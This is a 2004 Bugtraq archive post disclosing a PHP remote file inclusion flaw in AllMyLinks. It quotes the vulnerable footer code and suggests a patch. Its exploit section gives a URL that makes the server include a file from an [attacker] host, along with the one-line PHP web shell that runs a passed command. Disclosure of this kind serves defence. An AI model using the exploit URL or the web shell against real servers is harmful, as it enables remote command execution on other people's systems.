Bugtraq mailing list archives
AllMyLinks PHP Code Injection vulnerability
From: Pablo Santana <m4dsk4t3r () hotmail com>
Date: 14 Feb 2004 22:19:34 -0000
******** AllMyLinks PHP Code Injection vulnerability ******** Product : AllMyLinks Vendor : www.php-resource.net Date : February 14, 2004 Problem : PHP Code Injection Vendor Contacted ? : No ************************** Source **************************** in /include/footer.inc.php -------------------------------------------------------------- $AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php"); -------------------------------------------------------------- ************************** Exploit *************************** http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a in http://[attacker]/include/template.inc.php have : ------------------------ <? system($cmd); ?> ------------------------ ************************** Impact **************************** Malicious user execute arbitrary commands on the server . ************************* Solution *************************** in /include/footer.inc.php replace $AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php"); for if (isset($_AMLconfig['cfg_serverpath'])){ die("Don\'t Hack it :)"); } $AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php"); ************************** Credits **************************** bnfx : bnfx () antisocial com Mad_Skater : m4dsk4t3r () hotmail com TechTeam Brazilian Crew .
Current thread:
- AllMyLinks PHP Code Injection vulnerability Pablo Santana (Feb 16)